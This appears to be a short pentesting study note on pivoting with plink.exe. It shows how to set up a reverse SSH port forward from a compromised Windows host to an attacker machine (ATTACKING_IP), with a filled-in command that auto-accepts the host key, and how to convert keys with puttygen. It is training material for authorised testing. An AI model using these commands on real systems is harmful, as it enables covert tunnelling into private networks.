Plink.exe is a Windows command line version of the PuTTY SSH client. Now that Windows comes with its own inbuilt SSH client, plink is less useful for modern servers; however, it is still a very useful tool, so we will cover it here.

Since windows servers don’t have a lot of ssh connections, we are more likely to transfer the binaries to set a reverse connection with the command cmd.exe /c echo y | .\\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -N .

cmd.exe /c echo y | .\\plink.exe -R 8000:172.16.0.10:80 [email protected] -i KEYFILE -N

ssh-keygen won’t work for windows, we need puttygen ones.

sudo apt install putty-tools
puttygen KEYFILE -o OUTPUT_KEY.ppk

<aside> 💡 Note: Plink is notorious for going out of date quickly, which often results in failing to connect back. Always make sure you have an up to date version of the .exe. Whilst there is a copy pre-installed on Kali at /usr/share/windows-resources/binaries/plink.exe, downloading a new copy from here before a new engagement is sensible.

</aside>